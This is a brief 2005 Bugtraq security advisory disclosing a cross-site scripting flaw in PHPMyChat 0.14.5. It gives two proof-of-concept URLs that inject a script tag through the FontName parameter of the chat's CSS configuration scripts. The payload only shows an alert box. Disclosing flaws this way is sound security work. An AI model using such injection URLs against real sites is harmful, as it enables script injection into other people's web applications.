
Date: 14 May 2005 04:21:07 -0000
From: Megasky <magasky@...mail.com>
To: bugtraq@...urityfocus.com
Subject: PHPHeaven PHPMyChat Cross-site Scripting Vulnerablitiy




www.phpheaven.net/

Vulnerable versions: PHPMyChat 0.14.5

Proof of concept: 
http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt;


http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt;



